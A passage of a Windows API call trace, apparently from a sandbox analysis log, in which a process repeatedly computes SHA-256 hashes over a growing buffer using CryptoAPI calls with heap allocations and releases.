	[0217.064] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.064] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.064] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.064] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0217.064] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736788
	[0217.064] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736788, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736788, pdwDataLen=0x1284a8) returned 1
	[0217.064] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.064] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.064] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2762c50) returned 1
	[0217.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2762c50
	[0217.065] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.065] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.065] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0217.065] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27367b0
	[0217.065] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27367b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27367b0, pdwDataLen=0x1284a8) returned 1
	[0217.065] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.065] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.065] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.065] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.065] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0217.065] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27367d8
	[0217.065] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27367d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27367d8, pdwDataLen=0x1284a8) returned 1
	[0217.065] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.065] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.065] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.066] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.066] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0217.066] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736800
	[0217.066] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736800, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736800, pdwDataLen=0x1284a8) returned 1
	[0217.066] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.066] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.066] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.066] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.066] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0217.066] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736828
	[0217.066] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736828, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736828, pdwDataLen=0x1284a8) returned 1
	[0217.066] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.066] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.066] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.067] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.067] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0217.067] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736850
	[0217.067] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736850, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736850, pdwDataLen=0x1284a8) returned 1
	[0217.067] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.067] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.067] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.067] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.067] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0217.067] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736878
	[0217.067] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736878, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736878, pdwDataLen=0x1284a8) returned 1
	[0217.067] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.067] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.067] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.068] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.068] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0217.068] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27368a0
	[0217.068] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27368a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27368a0, pdwDataLen=0x1284a8) returned 1
	[0217.068] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.068] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.068] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.068] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.068] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0217.068] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27368c8
	[0217.068] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27368c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27368c8, pdwDataLen=0x1284a8) returned 1
	[0217.068] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.068] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.068] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.069] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.069] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0217.069] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27368f0
	[0217.069] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27368f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27368f0, pdwDataLen=0x1284a8) returned 1
	[0217.069] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.069] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.069] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.069] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.069] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0217.069] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736918
	[0217.069] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736918, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736918, pdwDataLen=0x1284a8) returned 1
	[0217.069] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.069] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.069] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.070] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.070] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0217.070] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736940
	[0217.070] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736940, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736940, pdwDataLen=0x1284a8) returned 1
	[0217.070] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.070] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.070] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.070] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.070] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0217.070] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736968
	[0217.070] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736968, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736968, pdwDataLen=0x1284a8) returned 1
	[0217.070] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.070] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.070] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.071] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.071] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0217.071] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736990
	[0217.071] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736990, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736990, pdwDataLen=0x1284a8) returned 1
	[0217.071] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.071] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.071] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.071] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.071] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0217.071] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27369b8
	[0217.071] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27369b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27369b8, pdwDataLen=0x1284a8) returned 1
	[0217.071] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.071] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.071] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.072] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.072] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0217.072] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27369e0
	[0217.072] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27369e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27369e0, pdwDataLen=0x1284a8) returned 1
	[0217.072] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.072] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.072] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.072] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.072] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0217.072] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736a08
	[0217.072] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736a08, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736a08, pdwDataLen=0x1284a8) returned 1
	[0217.072] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.072] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.072] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.073] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.073] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0217.073] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736a30
	[0217.073] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736a30, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736a30, pdwDataLen=0x1284a8) returned 1
	[0217.073] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.073] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.073] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.073] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.073] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0217.073] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736a58
	[0217.073] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736a58, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736a58, pdwDataLen=0x1284a8) returned 1
	[0217.073] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.073] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.073] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.074] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.074] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0217.074] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736a80
	[0217.074] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736a80, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736a80, pdwDataLen=0x1284a8) returned 1
	[0217.074] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.074] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.074] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.094] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.094] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0217.094] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736aa8
	[0217.094] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736aa8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736aa8, pdwDataLen=0x1284a8) returned 1
	[0217.094] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.094] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.094] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.095] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.095] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0217.095] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736ad0
	[0217.095] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736ad0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736ad0, pdwDataLen=0x1284a8) returned 1
	[0217.095] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.095] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.095] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.095] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.095] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0217.095] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736af8
	[0217.095] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736af8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736af8, pdwDataLen=0x1284a8) returned 1
	[0217.095] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.095] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.095] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.096] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.096] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0217.096] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736b20
	[0217.096] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736b20, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736b20, pdwDataLen=0x1284a8) returned 1
	[0217.096] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.096] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.096] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.096] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.096] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x300, dwFlags=0x0) returned 1
